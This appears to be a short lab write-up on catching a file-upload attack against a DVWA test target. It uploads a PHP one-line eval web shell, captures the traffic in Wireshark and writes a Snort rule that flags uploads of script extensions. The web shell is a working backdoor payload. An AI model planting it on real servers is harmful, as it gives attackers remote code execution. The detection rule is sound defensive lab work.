Environment introduction
Physical machine: win10+wireshark
target machine: win7+phpstudy+DVWA
Means of attack
Upload a file called 1.php
, for the contents <?php @eval($_POST['777']) ?>
of the file
before uploading, do wireshark capture and filter data
Write rules
alert tcp any any -> any any (msg:"DVWA-upload漏洞攻击"; flow:to_server,established; uricontent:"DVWA-master/vulnerabilities/upload"; fast_pattern:only; content:"name=|22|uploaded|22|"; content:"filename="; distance:0; pcre:"/filename[\s=]+?\x22.+?\.(php|phtml|html|php3|php5|jsp|asp|htm|war|phl|htaccess)/iP"; metadata:service http; sid:5; rev:1;)
analysis
Enter in the terminal (powershell)
snort -de -c C:\Snort\etc\snort.conf -l C:\Snort\log -r C:\dvwa抓包\file-upload.pcapng